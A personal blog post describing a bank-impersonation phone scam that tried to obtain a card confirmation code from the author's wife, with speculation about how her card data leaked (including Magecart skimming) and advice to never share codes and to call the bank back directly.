When fraud becomes personal - a cautionary tale
A few nights ago, my wife received a phone call from the fraud department at her bank. They wanted to let her know that they were worried that there had been some fraudulent purchases on her credit card and wanted to take immediate action to prevent those purchases going forward.
They went through the necessary verification checks, where the caller listed the name on the account, the first line of the address and the last 4-digits of the credit card number. Finally they got my wife to confirm the last purchase she’d made with the card just to double check.
Unfortunately according to the fraud team, it was looking like three purchases had been made with the card - totalling over £7,000, all from a suspicious IP address in Liverpool - and wanted to put a block on the card immediately.
But to do so, they needed a final piece of security verification…
“We’re going to send you a confirmation code via text message - once you’ve got it, just read it back to us to confirm that you are the account holder and we’ll place an immediate stop on the account - preventing those fraudulent transactions going through.”
A few seconds later and a text message came through - from the bank’s official number, in the same format and structure from all the other verification text messages she’d received from the bank:
XXX-XXX is your confirmation code for your purchase of 1720 GBP to FLUTTERWAVE. Please do not share this with anyone.
Hang on… A purchase? Of £1,720?? And what on earth is Flutterwave?!? “This doesn’t feel right” my wife said, “I’m going to hang-up and ring my bank directly”. The caller advised against doing that, because as a result of the fraudulent transactions, they’d locked her telephone banking account, and she could only do that in-person, in-branch, and it was now well past closing time.
You see the thing is, the man on the phone wasn’t from my wife’s bank - he was a fraudster. A fraudster who had got hold of my wife’s credit card details and was trying to make a money transfer via Flutterwave, a Fintech firm with some dubious associations with scams, fraud and moneylaundering. The trouble for the fraudster is that he’d hit against new measures brought in by banks in March last year, that required online retailers to demand additional verification, known as Strong Customer Authentication (SCA): https://www.fca.org.uk/firms/strong-customer-authentication
My wife was experiencing a scam that shows exactly why security measures such as Two Factor Authentication (2FA) do genuinely work despite the impact to the “User Experience”. This approach is forcing attackers to work harder, to have to resort to additional techniques such as social engineering to make their fraud work. It’s no magic silver bullet, but it’s enough to raise the bar required by attackers to achieve their aims.
So how did the fraudsters get hold of my wife’s credit card details, as well as our address and her phone number? The challenge is that we may never truly know for sure - but we can start to make a few assumptions:
If the card details had been taken by a Point-of-Sale skimmer (a compromised physical card scanner in shops), then they wouldn’t have had the address and phone number.
Even a discarded bank statement, would have unlikely had all the fields - not to mention that paperless banking is largely the default these days.
Whilst a fraudster could have been able to combine multiple data sets together, in reality, Occam’s Razor would suggest that the data was taken all at the same time - and this sort of dataset is common with online shopping, and we’ve just come through peak season with Christmas and the January Sales.
An account on an online shopping portal could have become compromised, with information scrapped from a user profile - but fraudsters work best at scale and whilst logging in to lots of individual accounts could net them some reward, it’s potentially a lot of work, reducing the return on investment.
An online retailer could have had a backend database compromised, containing 100s, if not 1000s of stored customer details. Retailers should be protecting this sort of data in accordance with PCIDSS standards, which includes the use of encryption as well as not storing fields like CVV/CVC numbers (the 3 or 4 numbers on the back of the card), which the fraudster would almost certainly have needed to complete their purchase. Unfortunately it’s not uncommon to hear stories of retailers not storing credit card data in a secure way, so it would be difficult to rule this one out entirely.
The card is a no more than 3months old, so any data breach has to have been recent. And one method of attack that is really have an extended spell of success is a style of attack known as Magecart.
Magecart attacks really broke into the cybersecurity scene back in 2018, with the major brands of TicketMaster and British Airways falling victim - and they’ve never really gone away. The attacks involve the compromise not of a backend data store, but on the actual payment portal itself, with data siphoned off in realtime, as unsuspecting customers enter in their details to make a purchase - one copy of the details going off to the legitimate retailer, and another off to the hackers.
In the end, my wife’s innate “spidey sense” was enough to put an end to the fraudsters attempts - and with it the quick thinking to freeze her card via her bank’s mobile app, and follow-up calls with her bank to report the scam and get a brand new card issued. But I can well imagine this sort of scam is likely to garner some pretty decent levels of success, especially as online shopping is continuing to maintain it’s popularity following the steady increase over many years, plus a real jump due to the Pandemic.
Security is often a trade-off with convenience, but certainly I don’t expect that ceasing all online shopping is the way forward. It’s also not enough to recommend you only shop via large reputable brands - after all, if Ticketmaster and British Airways can fall victim, so could much more smaller brands. So what should people do? In reality, it’s best to focus on the phone calls themselves. There are two simple steps that everyone should consider if they ever get a call like this:
Never share a confirmation code, and especially not with an unsolicited caller.
If ever there is a doubt that an unsolicited caller is not who they claim to be, hang up and ring them back using the number on the back of your card, or from the number on their website.